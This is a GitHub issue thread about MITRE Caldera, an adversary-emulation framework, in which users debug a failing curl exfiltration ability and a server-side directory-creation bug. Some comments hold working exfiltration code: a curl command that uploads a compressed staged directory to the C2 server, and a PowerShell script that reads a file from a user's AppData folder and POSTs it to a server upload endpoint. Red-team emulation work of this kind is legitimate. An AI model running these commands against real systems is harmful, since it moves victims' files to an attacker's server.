### ISSUE TITLE
Exfiltration with curl on linux returns 500

### ISSUE THREAD

**Issue by buratinoo0** [mitre/caldera#2786]
After staging a directory I try to exfiltrate it to Caldera server, but it returns 500 error code.

1. Run Caldera server with --insecure flag
2. Deploy a sandcat agent on linux machine
3. Create staged directory
4. Run Exfiltrate data HTTPS using curl linux ability

**Expected behavior**
Successful POST request and staged directory exfiltrated to caldera server.

**Screenshots**
![image](https://github.com/mitre/caldera/assets/70957854/e07f360a-20f3-4094-939f-40c30c05f9e7)
![image](https://github.com/mitre/caldera/assets/70957854/425b51b3-aee8-4dd3-aa5c-fc3b66fce62d)

**Desktop (please complete the following information):**
 - OS: Ubuntu 22.04
 - Browser Chrome
 - Version 4.2.0

**Additional context**
Also tried execute i from Calder server itself and get same response. Tried to apply some flags and found out that execurion fails here:
![image](https://github.com/mitre/caldera/assets/70957854/d4bee871-2d60-4f27-ad2b-3624965367e1)
As you can see operation start, the directory on C2 creates with success, but nothing is send from agent.

**Comment by G0r0d0v** [comment]
Also I need your help with locating log files, because when the issue appeared I couldn't find any log file XD. The only log source was server.py output.

**Comment by L015H4CK** [comment]
Hi,

have you tried running the exact same command manually without using CALDERA? Does it work for you?
If not, your problem is not CALDERA related. For me the command did not work as you posted it (got also 500 Internal Server Error). 

I am no expert in this topic so I tried something else that worked. Try the following command (taken from `Exfil staged directory` ability). This one worked for me manually and during an operation. Of course you can adapt it to your needs and it also uses curl.

```
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
```

Concerning log files, I do not think CALDERA stores logs anywhere - at least I never encountered them.

Best regards,
L015

**Comment by buratinoo0** [comment]
@L015H4CK Hi,

Thank you for your reply.

Yeah, I tried running the same command without using CALDEFA, it doesn't work, returns the same error. I got this command from ability, you mentioned. It failed each time I've tried. So after some time I found out this issue (https://github.com/mitre/caldera/issues/613#issuecomment-544259528) and modified my command accordingly. 

The thing is that I modified app/service/file_svc and disabled the next snippet:

`    async def create_exfil_operation_directory(self, dir_name, agent_name):
        print("create_exfil_operation_directory"+ str(self.data_svc.ram['operations']))
        op_list = self.data_svc.ram['operations']
        print("create_exfil_operation_directory - op list:" + str(op_list))
        op_list_filtered = [x for x in op_list if x.state not in x.get_finished_states()]
        print("create_exfil_operation_directory - op list filtered:" + str(op_list_filtered))
        special_chars = {ord(c): '_' for c in r':<>"/\|?*'}
        agent_opid = [(x.name.translate(special_chars), '_', x.start.strftime("%Y-%m-%d_%H%M%SZ"))
                      for x in op_list_filtered if agent_name in [y.paw for y in x.agents]]
        #print("create_exfil_operation_directory - agent_opid:" + str(agent_opid[0]))
        #path = os.path.join((dir_name), ''.join(agent_opid[0]))
        path = os.path.join((dir_name), ''.join(agent_opid))
        print("create_exfil_operation_directory - path: " + path)
        if not os.path.exists(path):
            print("create_exfil_operation_directory - creating path")
            os.makedirs(path)
        return path
`

After those steps exfil works fine with the same command , that caused this issue.

**Comment by heyquentin** [comment]
Oh man thank you for fixing this! I was trying an adversary from the emu plugin (APT29) which had exfil over C2 that used a powershell script from 2017 which didn't work. With your commented out line the following powershell should exfil:

```
$apiUrl = 'http://server:8888/file/upload'
$filePath = "C:\Users\administrator\AppData\Roaming\whatever.zip"
$fileContent = [IO.File]::ReadAllBytes($filePath)
$boundary = [System.Guid]::NewGuid().ToString()
$headers = @{'Content-Type' = "multipart/form-data; boundary=$boundary"}
$body = [System.Text.StringBuilder]::new()
$body.AppendLine("--$boundary")
$body.AppendLine('Content-Disposition: form-data; name="data"; filename="{0}"' -f (Split-Path $filePath -Leaf))
$body.AppendLine('Content-Type: application/octet-stream')
$body.AppendLine()
$body.Append([System.Text.Encoding]::Default.GetString($fileContent))
$body.AppendLine()
$body.AppendLine("--$boundary--")
$response = Invoke-RestMethod -Uri $apiUrl -Method 'POST' -Headers $headers -Body $body.ToString()
```

**Comment by elegantmoose** [comment]
@buratinoo0 were you doing this outside a Caldera operation? Seems like Caldera was trying to construct the exfil directory name based on operation ID but there wasnt one.

**Comment by elegantmoose** [comment]
reopen if still have issue.

**Comment by okridgway** [comment]
I have this issue

**Comment by ekoyle** [comment]
It appears that the upload expects to have the `X-Request-Id` header set to `<agent_hostname>-<agent_paw print>`.

See the following file for some examples:

https://github.com/mitre/stockpile/blob/master/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml#L14

It appears that `stockpile/data/abilities/discovery/46098c66-8d9a-4d23-8a95-dd5021c385ae.yml` was missed when this change was made (as was the documentation).
